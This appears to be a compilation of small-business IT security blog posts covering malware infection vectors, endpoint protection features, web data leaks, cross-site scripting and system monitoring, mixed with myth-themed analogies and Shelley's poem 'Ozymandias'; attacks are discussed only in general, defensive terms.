Malware and Flying Cars

This blog entry collects the information from my recent presentation on Malware.

Overview

Let me start by making it clear that the world has recently changed. I’m not talking about Thomas L. Friedman, water on Mars or the 350 new species found in the Eastern Himalayas. No, I’m talking about malware.

Time was when malicious software was written by kids in the comfort of their own home. They were more interested in exploring computing technology and claiming bragging rights than in actually doing something with the systems they took over. If problems occurred, they were mostly accidental. Today it’s different. Today malicious software is written by criminals for the purpose of making money. In yesterday’s world, you could get a computer virus and then launch a cleanup tool. Then, as it removed the infection, you were free to sit and ponder the lovely flying cars that we’d have in the future. Today, you could get a computer virus and never notice, then when you check your bank balance online, all your money could be transferred overseas while you ponder the fact we still don’t have our flying cars.

A lot has been written about different classifications of malware, and the differences between worms, viruses, trojans and the like. I see no need to repeat what’s been done before. Instead, I’d like to look at how malware can get on your system, what it can do once it’s there and what you can do about it.

Vectors

One way to get malware into the world is to just toss it onto the Web. There tend to three ways this is done. The easiest is for them to just put up their own website. However, if they do this, they have the same problem you might in driving traffic there. Sure, they can do all the basic advertising and search engine optimization (SEO) techniques to drive folks there, but in the end, people just won’t go a boring website. Instead, it helps to have a hook.

Though one would think that all it would take is making a fancy website about the new flying cars out there, the more common hook that we’re seeing today is to play on people’s fears. In this case, fears of malware. Yes, we are seeing sites out there designed resemble anti-malware sites… that exist to spread malware. They’ll even try to leverage current events fears, so if a legitimate company has an issue with one of their products, you’ll probably start seeing ads appear stating things like “Problem with [Company]? Try [Fake Antivirus]!”. You hit one of these sites, and it pops up a little dialog box that there may be a problem and asks whether you’d like to run a scan. When you click “Yes” (or “No”, they’re awfully helpful), it will pretend to run a scan, pretend to find problems and then offer you a lovely little cleanup utility. You download and run it, and promptly get infected. Then, just to pour salt in the wound, you’ll likely get a bill for removal services. Sophos reports that there are 15 new sites like this discovered daily.

A more difficult, but often more successful technique is to target a popular social networking site with a good reputation (not an unpopular one with a bad reputation). Social media sites are successful because regular users can post content. So, once there, they post content and try to get people to download it. If you go to a website and see a friend’s posting something about this cool video about flying cars, you can get infected, and your account starts posting the flying car malware too. That’s when your friends get into the mix. Since the content is being posted as you, it’s viewed as “safe”, so they download it and then they also get infected. In May, there was a quite successful attack of this type that was linked to a viral (in more ways than one) video of somewhat questionable taste.

The most difficult way, but often the most rewarding attack is to take over an already popular website. Most of the big sites on the Internet are pretty well protected these days, but if they manage to get control of one, they can load it up with malware. In fact, recent analysis has shown that some website carry around 18.000 pieces of malware. These attacks go on all the time. Sometimes they are general, as in earlier this year when there was an Internet-wide attack that aimed to find flaws in backend databases. Sometimes, though, sites are specially targeted, as in April when Paul McCartney’s website was hacked and all his visitors were infected with malware that stole their online banking usernames and passwords. Thus, the more interesting you are, the more of a target you will be. (Boring people should be safer.)

Of course, there is more than just web vectors. The second most popular attack is via email. It’s important to remember that email is fundamentally flawed. It was intended to serve email just within a local campus and was neither sufficiently scalable nor secure to be used in the way it is today. One fundamental problem is that anyone can send any email to anyone from anywhere. While there are a few technologies in place that limit this, the vast majority of attacks use this flaw.

So what does that mean? Basically, if an attacker can uncover a trusted relationship between you and someone else, all they have to do is send you an email as if it were from that person. You receive the email from good old Uncle Johnny and without puzzling over the fact that he was killed in that tragic flying falling car accident, you open it and suddenly get infected. Of course, not everyone has a (poor old) Uncle Johnny, so the attackers will use whatever they can to get you to open the email. Often times, this involves riding a popularity wave. Anytime we see news about a natural disaster or a celebrity death, there will be malware-laden spam in it’s wake — earthquakes producing tidal waves of infections.

Remember, organizations like the FBI and IRS send letters, not emails. If there’s a problem with a package delivery, your customer will call you, not UPS or DHL. If you get an email from someone you don’t expect, there’s a good chance that it also contains what you don’t expect.

Of course, the traditional attacks still work, so CDs, DVDs, BluRays, Floppies, media cards and USB are still legitimate vectors. In fact, some enterprising folks have managed to infect a keyboard. The basic principle here is to take over a system through any of the avenues into it. Thus, if you use a cell phone for email or connect an mp3 player up to your system, they can be suspicious too.

Lastly, there is the ever-popular “just break in” method. Every month, Microsoft releases patches. Every quarter, Adobe and Oracle do the same. In the open source world, patches come out hourly. Each one of these fixes a known issue. Some of them are remotely exploitable, meaning that if you don’t have them in place, an attacker can waltz right in and do what they wish. If you use a firewall but don’t keep up on patches, it’s like having a machine gun turret on your flying car, but ignoring the suspension problem. It’s going to catch up to you just like it did to Uncle Johnny.

Impact

So, once it infects you, what does this malware actually do? Well, short form: anything it wants. By the time the malware is running, it’s too late. It can grab your passwords as you use them, it can search your disk for sensitive data and copy it offsite, it can wait for you to login to your banking system and start transferring all of your money overseas while simultaneously interfering with your web browser so that everything looks normal. (There’s a lot of this latter going on right now.)

More, it can just sit there and wait for orders. Often, infected machines will gang together and form a “botnet” that is centrally controlled by a small group of attackers. The attackers can use these systems to send spam, steal user names, passwords, account numbers, credit card numbers, and so on. They can also rent these “services” to others if the price is right.

Analysis

What can you be doing about all this?

In addition to basic server and network hardening (firewall, disable unneeded applications, layers of defense, etc), you should deploy a complete endpoint security solution. Unlike previous versions of anti-malware that just matched signatures, a complete endpoint solution contains multiple features. You need to consider:

Anti-virus

Even though the old style of signature matching is considered passe, all those old attacks are still out there. You have to protect against them somehow and this isn’t a bad way.

Behavior-based Profiling

In addition to signatures, anti-malware systems can also look at what applications are actually doing. This used to be called “heuristics”, but these days tends be something like “suspicious behaviour detection” or “pre-execution analysis”. The way it works is to load a small environment around each application and detect what it’s going to do before it does it. If it’s something bad, it stops it. Please note that it is very important that this functions as “pre-execution” and not “during execution”. If it runs at the same time that the application does, there is a chance that the malicious behavior will run before the anti-malware system can stop it.

Firewall

This is a different sort of firewall than your Cisco ASA or Astaro (or the kind on a car, flying or otherwise). This is a host-level firewall that protects the server/workstation itself. The problem here isn’t to duplicate what the network firewall does, it’s to protect a layer where the network firewall cannot. If an attacker manages to get in to one of your workstations, in a normal network, they can then attack all the other workstations on that network. A local firewall protects against attacks pivoting within the same zone to take over more and more of your network.

Traditionally, host-based firewalls have been difficult to manage, but modern endpoint protection systems have central management consoles that makes this easier.

Application Control

The idea behind application control is simply that a central authority can determine which applications may or may not be run on a system. In the ideal world, of course, all users would have minimal privilege levels and not be allowed to run non-approved software. However, since many Windows applications require administrative privileges you need another layer. application control is this layer.

Web Browser Helper Objects

Some malware these days never touches the disk. When you hit a compromised site in your browser, it loads the malware into memory. Once there, it can look at browser traffic, analyze what you’re doing and take over sessions. Since it never hits the disk, it’s not detectable by traditional scanning technologies. Anti-malware solutions that have a Helper Object feature can protect your browser from this sort of malware. It basically wraps the browser and analyzes the pages you visit, providing a layer of protection.

Zero Day Protection

There is necessarily a delay between the discovery of a vulnerability and the availability of a patch. If malware is released during this delay, it’s called a Zero Day Exploit. A system that offers good Zero Day protection combines heuristics with a knowledge of system vulnerability types to catch problems before they take over a system. While it is impossible to ever achieve 100% protection against Zero Day Exploits, the good anti-malware suites are tested against these. You just have to pick one that does well in the independent tests.

Optional: Encryption

Some systems are including the ability to manage local encryption. This can protect important data against casual spying and theft. It’s worth noting that if the malware can manage to run at all, it can just wait until you decrypt the data to view it. However, it does add another layer and if you typically deal with sensitive data, it is worth considering.

Optional: Network Access Control

Network Access Control (NAC) allows your anti-malware system to communicate with your network infrastructure. In the old model, all a machine has to do to connect to the network is be plugged in. With NAC, you layer additional checks such as patch status and whether anti-malware services are running. This would be like a built-in breathalyzer in a flying car. (Can you imagine the drunk driving problem we’d have there?) It’s not been widely accepted yet, but it is growing. In the near future, it will likely be standard, so it would be wise to at least select a vendor that has experience in this field.

Optional: Data Loss Prevention

This technology is aware of the type of data that you work with and will examine it when it is accessed. If there is a rule against allowing that data to leave the network, the DLP system will block access to it. It is worth noting that this technology is still quite new and new technologies generally have a few bumps on the way to adoption. If the anti-malware system includes it, great… but it’s probably not essential quite yet.

Optional: Reporting

Some industries are unregulated and can just get by doing the best business they can. Most anti-malware systems these days have decent consoles that can be used to get a snapshot of activity. This is generally sufficient for most day-to-day operations. But, within a regulated or audited business, it can be important to show trends of activity over time. For this, you need a more robust reporting capability. Sadly, most systems do not include this in the basic package. However, if you have this need, be sure to ask about additional packages. It may be available.

Optional: Lightweight, Frequent Updates

I’ll admit that I’m biased. I like the systems that give me constant updates. If I had a flying car, I’d want to always know about potential problems so I could correct for them. I wouldn’t like it when those updates are big and bring my systems (or my car) down. However, it’s not a requirement per se. If your business doesn’t access the Internet often, slower and bigger updates may work just fine for you. On the other hand, if you have a distributed environment with branch offices or remote workers, consider the impact of pushing out updates.

Time Tested

There are some interesting new approaches in the world of anti-malware. While these are always worth considering, you should also be aware that this is a lot more complex than people think. Even the big vendors have had some pretty embarrassing problems as they grew their business. By all means, check out the newer players, but keep in mind that rocky starts are common in both business and software development. Do you want these rocky starts in your security software?

Also, if you want to check out the newer players, keep in mind that attackers are creating fake anti-malware sites and filling up the search engine listings with links to them. At the very least, pull the list and links from reviews in reputable journals. The last thing you need is to think you’re evaluating anti-malware when in fact you are installing malware itself.

Company Operations

Some anti-malware companies try to reduce their pricing by reducing service levels. From a business perspective, I understand this. It allows you to pick the level of service you want and pay accordingly. However, with security software and service, there is a huge value in responsiveness and operating hours. If there is a new outbreak on the Internet, you want to know that the company is addressing it. If you have a new outbreak, you want to be able to pick up the phone and get help… not an invitation to purchase the new “Uranium Level Tech Support”. (In general I feel that metallurgy belongs in my flying car, not in my technical support.)

Home and Mobile Use

These days, the idea of having a “secure” network are gone. If you allow users to connect to the network from their home or with their various smart phones, there are far too many ways in to the network to keep it secure at the perimeter. This means that the concept of “endpoint” extends out to computers that you don’t own. Luckily, some anti-malware vendors provide “bonus” licenses to cover home PCs and mobile devices. This way you can make sure that all the systems have a level of protection, even if they’re not exactly yours. If you’re advanced enough to be running NAC (above), you can even enforce connection requirements.

Multiplatform and Legacy Issues

If you are completely on the ball, and are only running the absolute latest and greatest operating systems and vehicles, congratulations! Most of us aren’t there (and are still driving pathetic land-bound conveyances). If you have a handful of older systems or systems running different operating systems, you may have a challenge with anti-malware. Many systems still require a separate console for each OS and some of them don’t even support the older systems. Keep this in mind during your evaluations.

Conclusion

In the end, if you have money, you are a target. While running anti-malware isn’t a perfect solution, it is certainly part of a measured response to the problem. As malaware gets increasingly nasty, you have to step up your defenses. I am assuming that you already have a firewall in place and have your servers reasonably configured. The next step would be endpoint protection. Sure, there are many many steps after this, but just having these three layers will get you in a position where there are many easier targets than you… which buys you the time to get proactive about things.

This essay was originally published by Alliance Technologies

Small Business Defense – Web Disclosure

The best defense you have against an accidental data leak is to keep a clear data classification policy and invest in technology that prevents data tagged “private” (or “non public”) from being released. However, that’s not practical for many businesses.

As an alternative, you can flip it around and run attacks against your own servers. You can do file-level scans and make sure that the only files made public are the ones that are supposed to be. Note though, that an attacker could always find your scanning software and use that to explore the system (as I did).

Alternatively alternatively, you could run various Google scans against your systems. You could even schedule them to occur on a regular basis. Of course, the scans would only be as good as the person setting them up and it would be quite possible that something could slip through. Of course, regardless, you’re only catching things this way once Google knows about them… and then attackers might be able to get them too.

You could also just not have any public Web presense at all. If there’s no web site, there’s no chance of a data leakage… but it would also make it difficult to get new business. The same goes for not having any private data. Unless you’re working strictly with open source, odds are that you’re going to have some secret.

You know, a data classification program is starting to look more appealing.

Small Business Attack – Web Disclosure

One of the flaws on a legacy server at the Iowa State University Cyber Defense Competition resulted in granting me the ability to scan the entire web directory. Normally, you’d think “What’s the big deal”, right? After all, the whole point of having a web server is to share it with the world.

In the case of the competition, some very private data was stored on the site. Sure, it was protected, but since there was the flaw that let me scan the system, it was easy enough to circumvent security restrictions and download the files I wanted. After all, I knew exactly where to look.

In the industry, we call this a “data leak”. Typically, it’s when private data somehow wanders across a boundary to the public world and someone on the outside finds it. This used to be primarily done via email or disk, but increasingly it occurs through the Web. As we combine web-based technologies into both extranets and intranets, the chance increases that something from the internal intranet world will cross over into the external extranet world.

Of course, it should be simple, right? Just keep the private stuff private… well, sorta. It turns out, not all information falls cleanly into “public” and “private” categories. Increasingly, attackers target private data, but if they can’t get it, they can leverage sorta-private data against sorta-public data. By finding, for example, the names of your board members on a public website, their mother’s maiden names from a genealogy site, and their personal associations from a search engine, an attacker is in the perfect position to start taking over accounts and working towards that more private data… and that’s just with purely public information.

Imagine if they were able to get confidential or private data…

Security Lessons from Nature – Units of Measurement

One thing that was hammered into me as I pursued my Physics degree was the importance of specifying units in my answers. Unlike my fellow students who chose to study Math, those of us in Physics actually had work that meant something. ;) At the time, I thought that my teachers were just being annoying, as it was pretty obvious what the units were.

Well, as it turns out, the reason that units matter in Physics is because it helps to build physical intuition. Since all answers match (at least, theoretically) reality, you can do a quick check against the answer at the end and make sure it makes sense (well, usually).

However, the reason that this works at all is because we defined all the units a long time ago. The International System of Units (which, for some stupid reason involving non-English languages, we abbreviate as “SI”), defines a unit for everything we have to measure and does so in such a way that it is standardized throughout the world.

The meter measures length, and is defined as the length of the path travelled by light in vacuum during a time interval of 1/299 792 458 of a second
The second measures time and is the duration of 9 192 631 770 periods of the radiation corresponding to the transition between the two hyperfine levels of the ground state of the cesium 133 atom.
The kelvin measures temperature and is the fraction 1/273.16 of the thermodynamic temperature of the triple point of water.
The candela measures luminous intensity, in a given direction, of a source that emits monochromatic radiation of frequency 540 x 1012 hertz and that has a radiant intensity in that direction of 1/683 watt per steradian.

Now, sure, for historical reasons, we have had to fix the values of the units to some pretty arbitrary numbers. However, whenever someone says that something is a second long, everyone knows exactly what they mean (unless it’s a justasecond, which quite a bit longer). That is the advantage of scientific consensus.

Which, of course, makes certain aspects of business difficult. Test of Time Design recently pointed out the problems with comparing yourself to your competition. Really though, the problem compounds when your competition starts comparing themselves to you too. That way, you build a vicious cycle of measurement and are soon making decisions based on metrics that are drifting further and further from reality.

I think that we tend to fall into the trap of measuring the easy things instead of the things that really matter. For example, there are many retail establishments that measure their progress against last year’s performance. What does that really measure? After all, you’re measuring in dollars, and the value of a dollar changes over time. If you base your business decisions on a constantly-changing unit, you have no idea if the changes you are making matter.

We see this problem in the security field as well. Many of us bemoan the lack of decent security metrics. Really, what we want to measure is how much we’re protecting the organization. However, it’s clear that the right way to measure that would be to wait until your company gets breached, figure out what it cost, travel back in time, put up defenses. Then you simply measure the cost of the breach and the cost of the defense, a little subtraction, and you know exactly what your solution is worth.

Alas, time travel can be tricky. So, we have to resort to other methods. There are communities doing some very interesting work in this subject. There are formal methods that are used in enterprises. However, those models tend to take time to work through… often time that the small business doesn’t have in the first place. Luckily, there’s another option.

Just fall back to physical intuition. Even if you can’t make a precise measurement of the weight of a brick, you can know that it’s going to hurt like hell when one hundred of them land on you. Similarly, you don’t need to know exactly what it will save you to deploy a security technology. You just need to look at the cost of the technology and ask yourself “if something bad happened, what would that cost me and how likely is it to happen?” Will this model work for a large enterprise where security solutions cost hundreds of thousands of dollars and can take up to a year to implement? Of course not. However, for small and medium sized business, most common security solutions are inexpensive enough that a rough intuitive calculation will probably do just fine.

Mythic Monday – Ozymandias

A bit of poetry to start your week:

Ozymandias by Percy Bysshe Shelley

I met a traveller from an antique land
Who said: “Two vast and trunkless legs of stone
Stand in the desert. Near them on the sand,
Half sunk, a shattered visage lies, whose frown
And wrinkled lip and sneer of cold command
Tell that its sculptor well those passions read
Which yet survive, stamped on these lifeless things,
The hand that mocked them and the heart that fed.
And on the pedestal these words appear:
`My name is Ozymandias, King of Kings:
Look on my works, ye mighty, and despair!’
Nothing beside remains. Round the decay
Of that colossal wreck, boundless and bare,
The lone and level sands stretch far away”.

Ozymandias (who we now know as Ramesses the Great) was an Egyptian king who many consider to be the most important one ever.

( probably translates as “World’s Greatest Pharaoh” and was found on a mug^*, probably given by Prince Ramesses-Meriamen-Nebweben in a desperate plea for attention.)

^*Not really.

As tempting as it is to go off on the typical history geek listing of great accomplishments, I’ll just point you to the Wikipedia Link instead. Besides, it’s more fun to look at Shelley’s poem. The point, fairly obviously, is that Ozymandias was one impressive guy in his day. He was the Grand Poobah of all of Egypt, did a lot of impressive stuff and was well neigh irreplaceable. Today, little remains of what he did, we get his name wrong in history and make fun of him in blog posts. He was vital in his day and was utterly erased by the sands of time.

(Granted, due to advances in archeology, we know that this isn’t historically true… but we’re talking about a poem from from 1818 (and this blog is ostensibly about IT security anyway, so we’re going to ignore the truth in favor of the lesson.))

We all know people like Ozymandias. Many of them, for some reason, seem to find jobs as IT administrators or developers. They may protect their knowledge within a little silo whilst claiming “job security”. They may build large and complex systems and brag about how they are so complex that no one can ever figure out how to support them. They may resist applying updates or integrating their systems in with everything else, because it’s their legacy. They may also be laid off in the next round.

The problem is that actually, Ozymandias was pretty impressive. He was the most important person in his sphere (being Egypt between 1279 BC to 1213 BC). However, he was clearly not the most important person ever (Bing says that was Juanita Gooden’s mother, Google is less certain) and his works have clearly not survived. The same applies to those special isolated IT systems.

The sad fact is that people don’t last forever, and whether they retire or move on, the systems they leave behind won’t last forever either. In fact, if there is a system that others were never allowed to maintain, it will often age even more quickly than other legacy solutions. No one will be able to troubleshoot it or update it for changing business conditions. It will begin to fail and then the business owners will likely look at purchasing a system to replace it.

Sadly, when this occurs, it serves to commoditize the business just a little bit more. Over time, that which makes a business unique will be eroded by the sands of time and when the business fails, nothing will be left but ruins. Then, three thousand years later, some historico-business-poet^* will write something about the former technology and how greatness doesn’t last.

^*OK, you tell me when they’ll call industry analysts in three thousand years.

The thing is, this could have been avoided. An empire does not exist solely for one man… nor does a business. If the business can identify those protectionist silos and work towards integrating them with the rest of the operations, not only can technological similarities be leveraged but it would be possible to add developers or maintainers and accelerate the adaptability of the business. This would drive the business away from becoming a commodity… then they just have to wait for the other businesses to slowly crumble into dust and they emerge victorious.

(Image by Hajor.)

Mythic Natural History – Encapsulation

Yesterday (as I write this), I was privileged to attend the Iowa State University Cyber Defense Competition. The basic idea is that you have students build a handful of servers that must withstand attack from the “red team” while simultaneously providing services.

Though I generally specialize in Linux defense, I did manage some successful attacks against both operating systems. There was one team that watched the network and blocked some of the IP addresses that were attacking them. There was another that was hiding behind a firewall appliance. However, what was most interesting was the level of awareness that different teams had about what I was doing. Generally, once I connected via an encrypted session, the admins let me do whatever I wanted to do. I could try exploit after exploit with no interference at all. Odds are, if they were watching me at all, they were looking at network traffic. As such, I was hidden from their view due to encapsulation.

TechTarget defines encapsulation as: “In general, encapsulation is the inclusion of one thing within another thing so that the included thing is not apparent. Decapsulation is the removal or the making apparent a thing previously encapsulated.” . . . but this is boring. I could go on at length about how TCPIP has layers like an onion (or an ogre), or I could just point you over to the The TCPIP Guide. However, since TCPIP is also boring, I’ll let you go read about it yourself.

Instead, I want to talk about the Mayans. After the competition, I was relaxing at home by reading a book of Mesoamerican Myth, and I got to a part that told how Xbalanque and Hunahpu (let’s call them Xbally and Huna for short) were contacted by their grandmother. Apparently, the spread of the Internet had not reached the Yucatán Peninsula by 250AD, so when their grandmother wished to send them a message, she didn’t send them an instant message. Instead, she told a louse.

Now, it is clearly ridiculous to think of a louse able to carry to a message all the way to the Eastern end of the Earth (likely Tulum), which is why it was most fortunate that the louse was swallowed by a toad. The toad, of course, was eaten by a snake, which was gobbled up by a hawk. The hawk then flew to Xbally and Huna. Of course, the hawk could not give them the message directly. He had to first disgorge the snake, which spit up the toad which vomited up the louse (you can’t keep a good louse down), which delivered the message. At which point, our pals Xbally and Huna went off to the underworld to work for some strangely-named underworld gods, avenge their father and otherwise exit the interesting part of our story.

See, the message couldn’t get there on it’s own. No matter how loud someone shouts, there’s a limited distance along which the message may be understood. Thus, it helps to encapsulate the message inside a louse (SSH). If anyone looks at the louse, they just think “eew, louse!” and not “hey, maybe that louse contains a secret message”. Even if the louse were cut open, it wouldn’t reveal anything other than louse guts. The message is well concealed.

However, even though a louse is a good way to hide in plain sight, it’s not so good at crossing distances. Particularly if the terrain is somewhat marshy. That’s why, if you don’t want the message to drown, you’d better put it in a toad (UDP). This way, the delivery is more robust.

(As an aside, I chose UDP over TCP for this analogy, because otherwise at the end of the story, Xbally and Huna would have to find another louse, give it a message that says that they got the message, shove it in the toad, feed the toad to the snake, let the hawk eat the snake and send the snake back to their grandmother… and that would just be silly.)

A toad, however, doesn’t do so well in all environments. It may be able to hop over a desert, but it would take a while and it could get lost. That’s why toads are more comfortable inside of snakes (IP). The snake has a more complex brain and can remember more of the environment than a toad can. Thus, instead of just hopping from puddle to puddle in the hope that it’s going the right way, the snake can take a more direct route… within it’s own little area. Snakes are, alas, not so good at crossing barriers like mountains and chasms. For that, you want a hawk (Link Layer). The hawk is used to flying and tends to have a good solid understanding of it’s environment. When it flies, even if snake-laden, the hawk can get where it needs to go quite quickly by flying through the air (Layer 1).

Thus, by combining all four animals (or Link, IP, UDP and SSH), you can get a message securely to where it needs to go. True, these days we use somewhat obscure mechanisms to do so, but hey, these days lice are relatively rare.

It’s a good tradeoff.

Small Business Defense – Cross Site Scripting

Let’s start with some basic assumptions:

You must have a website to do business in today’s world.
Your customers have to be able to post content, either on your website or on a shared thirdparty site that you have to use to communicate with them (twitter, Facebook or LinkedIn.
That communication method will be attacked.

So, you have two scenarios. Your own website or a third party website.

If it’s your own website, you have a bit more control. There are techniques that you can use to limit cross site scripting. The common advice is to use a whitelist of “good” characters, and filter out everything else. That’s not hard to do, actually. However, the problem has to be solved at every possible entrypoint, which if you don’t design it into the system can be very difficult.

However, if it’s on a third party website, your options are a trifle more limited. You don’t know what they allow or disallow. You don’t know what other users are going to post, or even who they may be. What you do know, though, is that there will be attacks. Do you trust them?

Odds are that the answer is “no”.

The good news is that there is a simple test that works on both your own website and the third party systems. Just log in and find what of your data you can see. If an attacker gets in, they will run attacks as you. If your local workstation is protected, you can probably assume that the attack will be limited to the context of the website itself. Thus, you can limit what an attacker can get to by simply controling the data that you allow online.

So here are two good rules of thumb:

If you don’t need to put pieces of data online, don’t.
If the site requires information that you don’t want to give, either don’t use the site or make something up.

Small Business Attack – Cross Site Scripting

On September 23rd, LiveJournal was attacked. The attackers used flash. When the flash file was loaded, it ran within the context of the user who was logged in and made changes to recent posts. This allowed the attack to spread friend-to-friend. It also harvested email addresses.

Doesn’t sound like much, does it? After all, it’s basically a flash virus that steals email addresses, right? What’s new there?

Well, let’s look at the one thing that makes LiveJournal a successful site. At it’s core, it allows users to post content and share links with one another. In order to block the attack, the admins had to effectively break the site until they tracked it down. The one thing that LiveJournal requires is the same thing that the attacker was able to use to get in. In fact, given what it does, there may not be a way to secure the system and still give users what they want.

OK, then, suppose you accept the fact that you’re going to be successfully attacked. How do you protect yourself?

It’s interesting to note that the attackers just wanted email addresses. Odds are that they could have gotten other things too. However, since many people publish their list of friends, it would be trivial to link those email addresses to other email addresses. Now, if you have a database of email addresses and the email addresses of people that are their friends, you have just what you need to run a phishing attack.

Do you allow your customers to post content on your website? Do you use any websites that allow you or your associates to post content? How are you protecting your data?

Note: since I wrote this post, but before it was posted, Reddit was similarly attacked.

Security Lessons from Nature – Status monitoring

I weigh between 150 and 155 pounds. What’s interesting is that, under ideal conditions, it is exactly between 150 and 155. I weigh myself regularly, and I have noticed that if my weight ever drops below 150, I get sick within a day. The same applies if it holds steady over 155 for more than a couple of days. Similarly, I have an average temperature range, and any significant variance typically bodes ill(ness).

The human body (really, all mammals) has many such metrics. In addition to weight and temp, there is an average heart rate, normal EKG, bone density and typical levels of vitamins, minerals and hormones. These can be measured in many ways, but they generally fall into two categories. Some things can be measured at a surface level (weight and temp), others require special equipment, a tolerance of invasive procedures and significant amounts of time. Of course, the more time you devote to it, the better the data you get, so these scans are generally only done when a problem is suspected.

The same applies to IT systems. There are certain metrics that are easily determined and if they vary, it can indicate a problem. Just like weight and temperature, some can be easily gathered, gathering others can impact the system, and some require the system to be down before they can be gathered.

Just like we generally don’t send people in for a full body scan on a regular basis, we aren’t in the habit of shutting down servers for a day each week and performing precautionary forensic analysis upon them. Instead, we prefer to check surface-level data: Disk, CPU and RAM usage, network connection statistics. If one of these indicate a problem, then and only then do we begin to dig more deeply and run scans that might impact system performance.

The key, just like my regular monitoring of my weight and temp, is to regularly monitor system performance metrics. Otherwise, you only catch problems after they’ve already impacted the system. Just as it’s easiest to deal with a cold before it really sets in, it’s easier to identify an attack at the beginning of the process.

Mythic Monday – Alternate Worlds

There is an interesting thing about studying Myth. Looking just at origin stories, there is a basic belief that each culture has but one. However, this isn’t true. Most cultures have many stories. Historically, this may be due to the constant culture clashes of warring tribes, where differing cultures absorbed parts of one another and partially merged in order to avoid utter annihilation. Politically, it may be because no matter how the rulers divided the maps, the people stayed more or less the same, and gods and goddesses were simply added into hierarchies (until we got to monotheism and saints started to serve this role). However, sociologically, what’s fascinating is that the stories can conflict and still both be viewed as true.

The human mind, apparently, has a desire to know and believe in the one universal truth, but doesn’t seem to have to deal with the cognitive dissonance around conflicting worlds. This has even been studied:

An initial study involved 50 three- and four-year-olds. Each child sat with two experimenters, a toy bear, a toy doll and a central pile of toy blocks. The first experimenter, located to the right, introduced the child to the doll Mary; together they pretended it was her bath-time and the child used one or more blocks as bath objects, such as soap. Then the second experimenter, located to the left, introduced the child to Bruno the bear. They pretended it was his bedtime and the child used one or more blocks in the game, for example as a pillow.

The crucial part came next, as the first experimenter told the child that Mary had grown tired and needed to sleep, whilst Bruno had woken and wanted to wash. Rather than using the toy block already established to be a pillow in Bruno’s world, the children, regardless of age, nearly always reached for a new block from the pile to use as a pillow for Mary.

In short, kids seem to resolve the conflict by constructing an alternate world for each story. In their minds, anything can happen within one world, but events in one world cannot cross over to the other. This keeps things simple and easily understood. Sure, we play with the idea here and there. We cross genres in the movies, comics and literature. However, even within these genres, you’ll find that there is a not-insignificant number of people who can easily point out half a dozen logical flaws in each story. It doesn’t matter how careful you are, the flaws seem to inevitably exist and leap right out at anyone who cares to look.

So, it would seem that we’re wired to allow for almost infinite flexibility but only so long as it stays segmented. So I have to ask, why do we insist on tearing down the walls?

I’ve seen numerous envionments, where for one reason or another, there are a mix of technologies in play. This makes sense. There are good reasons to use both Microsoft and Linux operating systems in an environment. The same goes for firewalls (Cisco/Astaro), endpoint protection (Sophos/Bit9) and word processing (MS Office/OpenOffice). Each of these technologies is powerful and can bring definite business advantages.

However, point here is that each should be kept isolated, as much as possible. From a security perspective, one can use flaws in one product to escalate an attack on another. Operationally, trying to connect diverse systems means that you are making both of them work in non-intended ways, which means that subject matter experts in both tend to point fingers at one another.

That’s not to say that every technology should be kept isolated. Not at all. Technology tends to fall into specific worlds. There are three primary Linux worlds: Ubuntu/Debian, SuSE and Red Hat. Each of these worlds have their own repositories, and are built to be more or less complete. Microsoft Windows tends be a bit less well defined, but it still has it’s set of technologies that are designed to inter-operate with one another and not necessarily with anything else. Yes, you can try to force it… but as the article shows, we don’t naturally think that way, so there may be problems.